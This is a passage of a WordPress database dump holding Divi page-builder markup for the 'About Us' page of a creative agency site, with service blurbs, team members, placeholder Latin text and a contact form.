type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\" field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" hover_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:37:23','2020-08-07 18:37:23','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(536,1,'2020-08-07 18:44:04','2020-08-07 18:44:04','Dhiraj Kumar, Founder WhatTheHell?','dhiraj kumar whatthehell?','','inherit','open','closed','','2649e3b0-dhiraj-isr-recovecred_1000000000000000000014','','','2020-08-07 18:44:50','2020-08-07 18:44:50','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/2649e3b0-dhiraj-isr-recovecred_1000000000000000000014.jpg',0,'attachment','image/jpeg',0),(537,1,'2020-08-07 18:46:56','2020-08-07 18:46:56','Dhiraj Kumar, Founder WhatTheHell?','dhiraj kumar whatthehell?','','inherit','open','closed','','artboard-2','','','2020-08-07 18:47:29','2020-08-07 18:47:29','',0,'https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg',0,'attachment','image/jpeg',0),(538,1,'2020-08-07 18:48:01','2020-08-07 18:48:01','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\" parallax=\"on\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"dhiraj kumar founder \" title_text=\"dhiraj kumar whatthehell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" 